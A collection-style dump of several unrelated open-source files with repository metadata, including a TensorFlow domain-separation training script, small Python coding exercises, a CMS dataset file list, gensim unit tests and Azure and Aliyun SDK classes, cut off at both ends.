'Target dataset to train_bkp on.')
tf.app.flags.DEFINE_string('dataset_dir', None,
'The directory where the dataset files are stored.')
tf.app.flags.DEFINE_string('master', '',
'BNS name of the TensorFlow master to use.')
tf.app.flags.DEFINE_string('train_log_dir', '/tmp/da/',
'Directory where to write event logs.')
tf.app.flags.DEFINE_string(
'layers_to_regularize', 'fc3',
'Comma-separated list of layer names to use MMD regularization on.')
tf.app.flags.DEFINE_float('learning_rate', .01, 'The learning rate')
tf.app.flags.DEFINE_float('alpha_weight', 1e-6,
'The coefficient for scaling the reconstruction '
'loss.')
tf.app.flags.DEFINE_float(
'beta_weight', 1e-6,
'The coefficient for scaling the private/shared difference loss.')
tf.app.flags.DEFINE_float(
'gamma_weight', 1e-6,
'The coefficient for scaling the shared encoding similarity loss.')
tf.app.flags.DEFINE_float('pose_weight', 0.125,
'The coefficient for scaling the pose loss.')
tf.app.flags.DEFINE_float(
'weight_decay', 1e-6,
'The coefficient for the L2 regularization applied for all weights.')
tf.app.flags.DEFINE_integer(
'save_summaries_secs', 60,
'The frequency with which summaries are saved, in seconds.')
tf.app.flags.DEFINE_integer(
'save_interval_secs', 60,
'The frequency with which the model is saved, in seconds.')
tf.app.flags.DEFINE_integer(
'max_number_of_steps', None,
'The maximum number of gradient steps. Use None to train_bkp indefinitely.')
tf.app.flags.DEFINE_integer(
'domain_separation_startpoint', 1,
'The global step to add the domain separation losses.')
tf.app.flags.DEFINE_integer(
'bipartite_assignment_top_k', 3,
'The number of top-k matches to use in bipartite matching adaptation.')
tf.app.flags.DEFINE_float('decay_rate', 0.95, 'Learning rate decay factor.')
tf.app.flags.DEFINE_integer('decay_steps', 20000, 'Learning rate decay steps.')
tf.app.flags.DEFINE_float('momentum', 0.9, 'The momentum value.')
tf.app.flags.DEFINE_bool('use_separation', False,
'Use our domain separation model.')
tf.app.flags.DEFINE_bool('use_logging', False, 'Debugging messages.')
tf.app.flags.DEFINE_integer(
'ps_tasks', 0,
'The number of parameter servers. If the value is 0, then the parameters '
'are handled locally by the worker.')
tf.app.flags.DEFINE_integer(
'num_readers', 4,
'The number of parallel readers that read data from the dataset.')
tf.app.flags.DEFINE_integer('num_preprocessing_threads', 4,
'The number of threads used to create the batches.')
tf.app.flags.DEFINE_integer(
'task', 0,
'The Task ID. This value is used when training with multiple workers to '
'identify each worker.')
tf.app.flags.DEFINE_string('decoder_name', 'small_decoder',
'The decoder to use.')
tf.app.flags.DEFINE_string('encoder_name', 'default_encoder',
'The encoder to use.')
################################################################################
# Flags that control the architecture and losses
################################################################################
tf.app.flags.DEFINE_string(
'similarity_loss', 'grl',
'The method to use for encouraging the common encoder codes to be '
'similar, one of "grl", "mmd", "corr".')
tf.app.flags.DEFINE_string('recon_loss_name', 'sum_of_pairwise_squares',
'The name of the reconstruction loss.')
tf.app.flags.DEFINE_string('basic_tower', 'pose_mini',
'The basic tower building block.')
def provide_batch_fn():
""" The provide_batch function to use. """
return dataset_factory.provide_batch
def main(_):
model_params = {
'use_separation': FLAGS.use_separation,
'domain_separation_startpoint': FLAGS.domain_separation_startpoint,
'layers_to_regularize': FLAGS.layers_to_regularize,
'alpha_weight': FLAGS.alpha_weight,
'beta_weight': FLAGS.beta_weight,
'gamma_weight': FLAGS.gamma_weight,
'pose_weight': FLAGS.pose_weight,
'recon_loss_name': FLAGS.recon_loss_name,
'decoder_name': FLAGS.decoder_name,
'encoder_name': FLAGS.encoder_name,
'weight_decay': FLAGS.weight_decay,
'batch_size': FLAGS.batch_size,
'use_logging': FLAGS.use_logging,
'ps_tasks': FLAGS.ps_tasks,
'task': FLAGS.task,
}
g = tf.Graph()
with g.as_default():
with tf.device(tf.train.replica_device_setter(FLAGS.ps_tasks)):
# Load the data.
source_images, source_labels = provide_batch_fn()(
FLAGS.source_dataset, 'train_bkp', FLAGS.dataset_dir, FLAGS.num_readers,
FLAGS.batch_size, FLAGS.num_preprocessing_threads)
target_images, target_labels = provide_batch_fn()(
FLAGS.target_dataset, 'train_bkp', FLAGS.dataset_dir, FLAGS.num_readers,
FLAGS.batch_size, FLAGS.num_preprocessing_threads)
# In the unsupervised case all the samples in the labeled
# domain are from the source domain.
domain_selection_mask = tf.fill((source_images.get_shape().as_list()[0],),
True)
# When using the semisupervised model we include labeled target data in
# the source labelled data.
if FLAGS.target_labeled_dataset != 'none':
# 1000 is the maximum number of labelled target samples that exists in
# the datasets.
target_semi_images, target_semi_labels = provide_batch_fn()(
FLAGS.target_labeled_dataset, 'train_bkp', FLAGS.batch_size)
# Calculate the proportion of source domain samples in the semi-
# supervised setting, so that the proportion is set accordingly in the
# batches.
proportion = float(source_labels['num_train_samples']) / (
source_labels['num_train_samples'] +
target_semi_labels['num_train_samples'])
rnd_tensor = tf.random_uniform(
(target_semi_images.get_shape().as_list()[0],))
domain_selection_mask = rnd_tensor < proportion
source_images = tf.where(domain_selection_mask, source_images,
target_semi_images)
source_class_labels = tf.where(domain_selection_mask,
source_labels['classes'],
target_semi_labels['classes'])
if 'quaternions' in source_labels:
source_pose_labels = tf.where(domain_selection_mask,
source_labels['quaternions'],
target_semi_labels['quaternions'])
(source_images, source_class_labels, source_pose_labels,
domain_selection_mask) = tf.train.shuffle_batch(
[
source_images, source_class_labels, source_pose_labels,
domain_selection_mask
],
FLAGS.batch_size,
50000,
5000,
num_threads=1,
enqueue_many=True)
else:
(source_images, source_class_labels,
domain_selection_mask) = tf.train.shuffle_batch(
[source_images, source_class_labels, domain_selection_mask],
FLAGS.batch_size,
50000,
5000,
num_threads=1,
enqueue_many=True)
source_labels = {}
source_labels['classes'] = source_class_labels
if 'quaternions' in source_labels:
source_labels['quaternions'] = source_pose_labels
slim.get_or_create_global_step()
tf.summary.image('source_images', source_images, max_outputs=3)
tf.summary.image('target_images', target_images, max_outputs=3)
dsn.create_model(
source_images,
source_labels,
domain_selection_mask,
target_images,
target_labels,
FLAGS.similarity_loss,
model_params,
basic_tower_name=FLAGS.basic_tower)
# Configure the optimization scheme:
learning_rate = tf.train.exponential_decay(
FLAGS.learning_rate,
slim.get_or_create_global_step(),
FLAGS.decay_steps,
FLAGS.decay_rate,
staircase=True,
name='learning_rate')
tf.summary.scalar('learning_rate', learning_rate)
tf.summary.scalar('total_loss', tf.losses.get_total_loss())
opt = tf.train.MomentumOptimizer(learning_rate, FLAGS.momentum)
tf.logging.set_verbosity(tf.logging.INFO)
# Run training.
loss_tensor = slim.learning.create_train_op(
slim.losses.get_total_loss(),
opt,
summarize_gradients=True,
colocate_gradients_with_ops=True)
slim.learning.train(
train_op=loss_tensor,
logdir=FLAGS.train_log_dir,
master=FLAGS.master,
is_chief=FLAGS.task == 0,
number_of_steps=FLAGS.max_number_of_steps,
save_summaries_secs=FLAGS.save_summaries_secs,
save_interval_secs=FLAGS.save_interval_secs)
if __name__ == '__main__':
tf.app.run()
| [
"[email protected]"
] | |
b4a2db0fc6da43c2eb0ad5f2cd65f2c360d65ad7 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /eDQDChGrv6y4fd44j_20.py | 1a24d4d5555b5a19f0f2a0043b0899ec7134f363 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,156 | py | """
A billboard is an `m * n` list, where each list element consists of either one
letter or a blank space. You are given a phrase and the billboard dimensions.
Create a function that determines whether you can place the complete phrase on
the billboard.
There are two rules:
1. If there is a space between two words:
* If they are on the same row, you must put a space.
* If they are two different rows, the space is optional.
2. You can only put COMPLETE words on a row.
To illustrate, `can_put("GOOD MORN", [2, 4])` should yield `True`, since while
there is a space between "GOOD" and "MORN", it's not needed since both words
are on separate rows.
[
["G", "O", "O", "D"],
["M", "O", "R", "N"]
]
On the other hand `can_put("GOOD MORN", [1, 8])` should yield `False`. Since
both words reside in the first row, we require nine spots, and eight would
yield the incomplete phrase "GOOD MOR".
[
["G", "O", "O", "D", "_", "M", "O", "R"]
]
We would also return `False` if we could not fit a word on a row. So
`can_put("GOOD MORN", [3,3])` should yield `False`, since we can only fit
"GOO" on the first row.
[
["G", "O", "O"],
["D", "_", "M"],
["O", "R", "N"]
]
# No good!
### Examples
can_put("HEY JUDE", [2, 4]) ➞ True
can_put("HEY JUDE", [1, 8]) ➞ True
can_put("HEY JUDE", [1, 7]) ➞ False
can_put("HEY JUDE", [4, 3]) ➞ False
### Notes
It is okay to leave extra empty spaces on one line if you cannot fit two words
with a space. For example, in a 5 x 5 billboard, you can put "BE" on the first
row and "HAPPY" on the second row.
"""
def can_put(message, dimensions):
def fit_word(pointer, word):
height, width = dimensions
row, col = pointer
if width - col >= len(word): #fits in line
return (row, col + len(word) + 1)
elif row + 1 < height and len(word) <= width:
return (row + 1, len(word) + 1)
pointer = (0,0)
for word in message.split():
pointer = fit_word(pointer, word)
if not pointer:
return False
return True
| [
"[email protected]"
] | |
f0c76d1fa08e79952459a729a781ae1b1a1a853d | 78144baee82268a550400bbdb8c68de524adc68f | /Production/python/Fall17/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8_cff.py | c7058877ed083db8890af32476f19744018f6428 | [] | no_license | tklijnsma/TreeMaker | e6989c03189b849aff2007bad22e2bfc6922a244 | 248f2c04cc690ef2e2202b452d6f52837c4c08e5 | refs/heads/Run2_2017 | 2023-05-26T23:03:42.512963 | 2020-05-12T18:44:15 | 2020-05-12T18:44:15 | 263,960,056 | 1 | 2 | null | 2020-09-25T00:27:35 | 2020-05-14T15:57:20 | null | UTF-8 | Python | false | false | 3,838 | py | import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/001CEA5F-72C9-E811-BA66-00259029E84C.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/2CD7E036-72C9-E811-B8BC-B499BAAC0572.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/4A60530E-72C9-E811-9AC1-1866DA879ED8.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/5A6EF34A-72C9-E811-B5F2-001E67DDC051.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/00000/D8371BB4-7DC7-E811-B485-002590D9D8AE.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/1ED8C138-4BBB-E811-B449-246E96D10C24.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/2C39513A-4BBB-E811-A565-F02FA768CFE4.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/30571216-4BBB-E811-AD1A-0CC47A0AD476.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/42FFEC30-4BBB-E811-81B7-001E67397003.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/58987AEF-4ABB-E811-BFD6-E0071B6C9DF0.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/5E81430E-5CBA-E811-9AE8-002590D9D8AE.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/60152222-4BBB-E811-AD87-0CC47AD990C4.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/6A2711BC-4BBB-E811-88C7-0026B92786AC.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/90B7CF6A-4BBB-E811-A85C-1866DAEB1FC8.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/D6F1494D-4BBB-E811-8551-7CD30ACE1B58.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/270000/F48D6DF7-4ABB-E811-8D2F-0CC47A7C3424.root',
'/store/mc/RunIIFall17MiniAODv2/SMS-T2tt_mStop-1200_mLSP-100_TuneCP2_13TeV-madgraphMLM-pythia8/MINIAODSIM/PU2017_12Apr2018_94X_mc2017_realistic_v14-v1/60000/D0903CAD-F5C5-E811-80BC-002590D9D8C4.root',
] )
| [
"[email protected]"
] | |
4f4b68ca0c6623d671747618cbe6275ec180ab9f | b22cbe574c6fd43fde3dc82441805917b5996bb2 | /test/util.py | 9a84f69774201372124c9d12aad475c699637b11 | [] | no_license | matthagy/hlab | 7a7b16526ee06f9b6211e387795e09c6438b536c | 1bea77cf6df460f1828f99f3a54251d20e2d0f3d | refs/heads/master | 2021-01-25T03:26:52.311278 | 2012-07-23T16:20:11 | 2012-07-23T16:20:11 | 2,352,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,332 | py | '''Assorted unit tests utilities
'''
import unittest
from HH2.pathutils import FilePath,DirPath
def basepath():
filebase = FilePath(__file__).abspath().stripext()
backpath = __name__.replace('.','/')
assert filebase.endswith(backpath)
path = DirPath(filebase[:-len(backpath)])
assert path.isdir()
return path
basepath = basepath()
loader = unittest.TestLoader()
def load_file_tests(path):
path = path.stripext()
assert path.startswith(basepath)
name = path[len(basepath)+1::].replace('/','.')
mod = __import__(name, fromlist=name.rsplit('.',1)[-1:])
return loader.loadTestsFromModule(mod)
def load_directory_tests(path, recursive=True):
tests = []
for p in DirPath(path):
if p.isdir():
if recursive:
tests.extend(load_directory_tests(p, recursive=True))
elif (p.endswith('.py') and not p.basename().startswith('.') and
not p.statswith('__') and not p.basename() in ['util']):
tests.extend(load_file_tests(p))
return tests
def test_directory(basefile):
basefile = FilePath(basefile)
assert basefile.basename().startswith('__main__.py')
tests = unittest.TestSuite(load_directory_tests(basefile.abspath().parent()))
runner = unittest.TextTestRunner(verbosity=2)
runner.run(tests)
| [
"[email protected]"
] | |
e91fb3b0579a68d2e180e42add34ad6919708d82 | 3929d114c1bc6aef86402300a8d5b278849d41ae | /186. Reverse Words in a String II.py | 8cc8dc1f28c024f2e87d00719eb97c60a509c32c | [] | no_license | lxyshuai/leetcode | ee622235266017cf18da9b484f87c1cf9ceb91d0 | 5f98270fbcd2d28d0f2abd344c3348255a12882a | refs/heads/master | 2020-04-05T21:29:37.140525 | 2018-12-16T13:17:15 | 2018-12-16T13:17:15 | 157,222,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,135 | py | """
Given an input string, reverse the string word by word. A word is defined as a sequence of non-space characters.
The input string does not contain leading or trailing spaces and the words are always separated by a single space.
For example,
Given s = "the sky is blue",
return "blue is sky the".
Could you do it in-place without allocating extra space?
"""
class Solution(object):
def reverseWords(self, s):
"""
:type s: str
:rtype: str
"""
def reverse(string_list, left, right):
while left < right:
string_list[left], string_list[right] = string_list[right], string_list[left]
left += 1
right -= 1
string_list = list(s)
reverse(string_list, 0, len(string_list) - 1)
left = 0
right = 0
while right < len(string_list):
if string_list[right].isspace():
reverse(string_list, left, right - 1)
left = right + 1
right += 1
return ''.join(string_list)
if __name__ == '__main__':
print Solution().reverseWords('a b c d')
| [
"[email protected]"
] | |
9dfef73bdb4ca36d08e448d5637ff33d58b50b88 | 325fde42058b2b82f8a4020048ff910cfdf737d7 | /src/aks-preview/azext_aks_preview/vendored_sdks/azure_mgmt_preview_aks/v2019_02_01/models/managed_cluster_addon_profile_py3.py | 71e05cd14c0e9e64885cfee910165304b5df4421 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | ebencarek/azure-cli-extensions | 46b0d18fe536fe5884b00d7ffa30f54c7d6887d1 | 42491b284e38f8853712a5af01836f83b04a1aa8 | refs/heads/master | 2023-04-12T00:28:44.828652 | 2021-03-30T22:34:13 | 2021-03-30T22:34:13 | 261,621,934 | 2 | 5 | MIT | 2020-10-09T18:21:52 | 2020-05-06T01:25:58 | Python | UTF-8 | Python | false | false | 1,290 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ManagedClusterAddonProfile(Model):
"""A Kubernetes add-on profile for a managed cluster.
All required parameters must be populated in order to send to Azure.
:param enabled: Required. Whether the add-on is enabled or not.
:type enabled: bool
:param config: Key-value pairs for configuring an add-on.
:type config: dict[str, str]
"""
_validation = {
'enabled': {'required': True},
}
_attribute_map = {
'enabled': {'key': 'enabled', 'type': 'bool'},
'config': {'key': 'config', 'type': '{str}'},
}
def __init__(self, *, enabled: bool, config=None, **kwargs) -> None:
super(ManagedClusterAddonProfile, self).__init__(**kwargs)
self.enabled = enabled
self.config = config
| [
"[email protected]"
] | |
419db0786d502a3cf9c1eae20144f684848c9409 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/gensim/test/test_utils.py | 240900129cf6621eddafef08f2c921360b47d10e | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 6,864 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
Automated tests for checking various utils functions.
"""
import logging
import unittest
import numpy as np
from six import iteritems
from gensim import utils
class TestIsCorpus(unittest.TestCase):
def test_None(self):
# test None
result = utils.is_corpus(None)
expected = (False, None)
self.assertEqual(expected, result)
def test_simple_lists_of_tuples(self):
# test list words
# one document, one word
potentialCorpus = [[(0, 4.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
# one document, several words
potentialCorpus = [[(0, 4.), (1, 2.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
potentialCorpus = [[(0, 4.), (1, 2.), (2, 5.), (3, 8.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
# several documents, one word
potentialCorpus = [[(0, 4.)], [(1, 2.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
potentialCorpus = [[(0, 4.)], [(1, 2.)], [(2, 5.)], [(3, 8.)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
def test_int_tuples(self):
potentialCorpus = [[(0, 4)]]
result = utils.is_corpus(potentialCorpus)
expected = (True, potentialCorpus)
self.assertEqual(expected, result)
def test_invalid_formats(self):
# test invalid formats
# these are no corpus, because they do not consists of 2-tuples with
# the form(int, float).
potentials = list()
potentials.append(["human"])
potentials.append("human")
potentials.append(["human", "star"])
potentials.append([1, 2, 3, 4, 5, 5])
potentials.append([[(0, 'string')]])
for noCorpus in potentials:
result = utils.is_corpus(noCorpus)
expected = (False, noCorpus)
self.assertEqual(expected, result)
class TestUtils(unittest.TestCase):
def test_decode_entities(self):
# create a string that fails to decode with unichr on narrow python builds
body = u'It’s the Year of the Horse. YES VIN DIESEL 🙌 💯'
expected = u'It\x92s the Year of the Horse. YES VIN DIESEL \U0001f64c \U0001f4af'
self.assertEqual(utils.decode_htmlentities(body), expected)
class TestSampleDict(unittest.TestCase):
def test_sample_dict(self):
d = {1: 2, 2: 3, 3: 4, 4: 5}
expected_dict = [(1, 2), (2, 3)]
expected_dict_random = [(k, v) for k, v in iteritems(d)]
sampled_dict = utils.sample_dict(d, 2, False)
self.assertEqual(sampled_dict, expected_dict)
sampled_dict_random = utils.sample_dict(d, 2)
if sampled_dict_random in expected_dict_random:
self.assertTrue(True)
class TestWindowing(unittest.TestCase):
arr10_5 = np.array([
[0, 1, 2, 3, 4],
[1, 2, 3, 4, 5],
[2, 3, 4, 5, 6],
[3, 4, 5, 6, 7],
[4, 5, 6, 7, 8],
[5, 6, 7, 8, 9]
])
def _assert_arrays_equal(self, expected, actual):
self.assertEqual(expected.shape, actual.shape)
self.assertTrue((actual == expected).all())
def test_strided_windows1(self):
out = utils.strided_windows(range(5), 2)
expected = np.array([
[0, 1],
[1, 2],
[2, 3],
[3, 4]
])
self._assert_arrays_equal(expected, out)
def test_strided_windows2(self):
input_arr = np.arange(10)
out = utils.strided_windows(input_arr, 5)
expected = self.arr10_5.copy()
self._assert_arrays_equal(expected, out)
out[0, 0] = 10
self.assertEqual(10, input_arr[0], "should make view rather than copy")
def test_strided_windows_window_size_exceeds_size(self):
input_arr = np.array(['this', 'is', 'test'], dtype='object')
out = utils.strided_windows(input_arr, 4)
expected = np.ndarray((0, 0))
self._assert_arrays_equal(expected, out)
def test_strided_windows_window_size_equals_size(self):
input_arr = np.array(['this', 'is', 'test'], dtype='object')
out = utils.strided_windows(input_arr, 3)
expected = np.array([input_arr.copy()])
self._assert_arrays_equal(expected, out)
def test_iter_windows_include_below_window_size(self):
texts = [['this', 'is', 'a'], ['test', 'document']]
out = utils.iter_windows(texts, 3, ignore_below_size=False)
windows = [list(w) for w in out]
self.assertEqual(texts, windows)
out = utils.iter_windows(texts, 3)
windows = [list(w) for w in out]
self.assertEqual([texts[0]], windows)
def test_iter_windows_list_texts(self):
texts = [['this', 'is', 'a'], ['test', 'document']]
windows = list(utils.iter_windows(texts, 2))
list_windows = [list(iterable) for iterable in windows]
expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
self.assertListEqual(list_windows, expected)
def test_iter_windows_uses_views(self):
texts = [np.array(['this', 'is', 'a'], dtype='object'), ['test', 'document']]
windows = list(utils.iter_windows(texts, 2))
list_windows = [list(iterable) for iterable in windows]
expected = [['this', 'is'], ['is', 'a'], ['test', 'document']]
self.assertListEqual(list_windows, expected)
windows[0][0] = 'modified'
self.assertEqual('modified', texts[0][0])
def test_iter_windows_with_copy(self):
texts = [
np.array(['this', 'is', 'a'], dtype='object'),
np.array(['test', 'document'], dtype='object')
]
windows = list(utils.iter_windows(texts, 2, copy=True))
windows[0][0] = 'modified'
self.assertEqual('this', texts[0][0])
windows[2][0] = 'modified'
self.assertEqual('test', texts[1][0])
def test_flatten_nested(self):
nested_list = [[[1, 2, 3], [4, 5]], 6]
expected = [1, 2, 3, 4, 5, 6]
self.assertEqual(utils.flatten(nested_list), expected)
def test_flatten_not_nested(self):
not_nested = [1, 2, 3, 4, 5, 6]
expected = [1, 2, 3, 4, 5, 6]
self.assertEqual(utils.flatten(not_nested), expected)
if __name__ == '__main__':
logging.root.setLevel(logging.WARNING)
unittest.main()
| [
"[email protected]"
] | |
547f56cae470648424b7485f6231f2167b17b872 | 9405aa570ede31a9b11ce07c0da69a2c73ab0570 | /aliyun-python-sdk-hbase/aliyunsdkhbase/request/v20190101/CreateInstanceRequest.py | 6dcc7d5ca183ba80569cfe098efcfdd438b27383 | [
"Apache-2.0"
] | permissive | liumihust/aliyun-openapi-python-sdk | 7fa3f5b7ea5177a9dbffc99e73cf9f00e640b72b | c7b5dd4befae4b9c59181654289f9272531207ef | refs/heads/master | 2020-09-25T12:10:14.245354 | 2019-12-04T14:43:27 | 2019-12-04T14:43:27 | 226,002,339 | 1 | 0 | NOASSERTION | 2019-12-05T02:50:35 | 2019-12-05T02:50:34 | null | UTF-8 | Python | false | false | 6,117 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkhbase.endpoint import endpoint_data
class CreateInstanceRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'HBase', '2019-01-01', 'CreateInstance','hbase')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClusterName(self):
return self.get_query_params().get('ClusterName')
def set_ClusterName(self,ClusterName):
self.add_query_param('ClusterName',ClusterName)
def get_DbInstanceConnType(self):
return self.get_query_params().get('DbInstanceConnType')
def set_DbInstanceConnType(self,DbInstanceConnType):
self.add_query_param('DbInstanceConnType',DbInstanceConnType)
def get_EngineVersion(self):
return self.get_query_params().get('EngineVersion')
def set_EngineVersion(self,EngineVersion):
self.add_query_param('EngineVersion',EngineVersion)
def get_DepMode(self):
return self.get_query_params().get('DepMode')
def set_DepMode(self,DepMode):
self.add_query_param('DepMode',DepMode)
def get_BackupId(self):
return self.get_query_params().get('BackupId')
def set_BackupId(self,BackupId):
self.add_query_param('BackupId',BackupId)
def get_DbInstanceType(self):
return self.get_query_params().get('DbInstanceType')
def set_DbInstanceType(self,DbInstanceType):
self.add_query_param('DbInstanceType',DbInstanceType)
def get_VSwitchId(self):
return self.get_query_params().get('VSwitchId')
def set_VSwitchId(self,VSwitchId):
self.add_query_param('VSwitchId',VSwitchId)
def get_SecurityIPList(self):
return self.get_query_params().get('SecurityIPList')
def set_SecurityIPList(self,SecurityIPList):
self.add_query_param('SecurityIPList',SecurityIPList)
def get_AutoRenew(self):
return self.get_query_params().get('AutoRenew')
def set_AutoRenew(self,AutoRenew):
self.add_query_param('AutoRenew',AutoRenew)
def get_NetType(self):
return self.get_query_params().get('NetType')
def set_NetType(self,NetType):
self.add_query_param('NetType',NetType)
def get_ZoneId(self):
return self.get_query_params().get('ZoneId')
def set_ZoneId(self,ZoneId):
self.add_query_param('ZoneId',ZoneId)
def get_CoreDiskType(self):
return self.get_query_params().get('CoreDiskType')
def set_CoreDiskType(self,CoreDiskType):
self.add_query_param('CoreDiskType',CoreDiskType)
def get_PricingCycle(self):
return self.get_query_params().get('PricingCycle')
def set_PricingCycle(self,PricingCycle):
self.add_query_param('PricingCycle',PricingCycle)
def get_CoreInstanceQuantity(self):
return self.get_query_params().get('CoreInstanceQuantity')
def set_CoreInstanceQuantity(self,CoreInstanceQuantity):
self.add_query_param('CoreInstanceQuantity',CoreInstanceQuantity)
def get_Duration(self):
return self.get_query_params().get('Duration')
def set_Duration(self,Duration):
self.add_query_param('Duration',Duration)
def get_Engine(self):
return self.get_query_params().get('Engine')
def set_Engine(self,Engine):
self.add_query_param('Engine',Engine)
def get_RestoreTime(self):
return self.get_query_params().get('RestoreTime')
def set_RestoreTime(self,RestoreTime):
self.add_query_param('RestoreTime',RestoreTime)
def get_SrcDBInstanceId(self):
return self.get_query_params().get('SrcDBInstanceId')
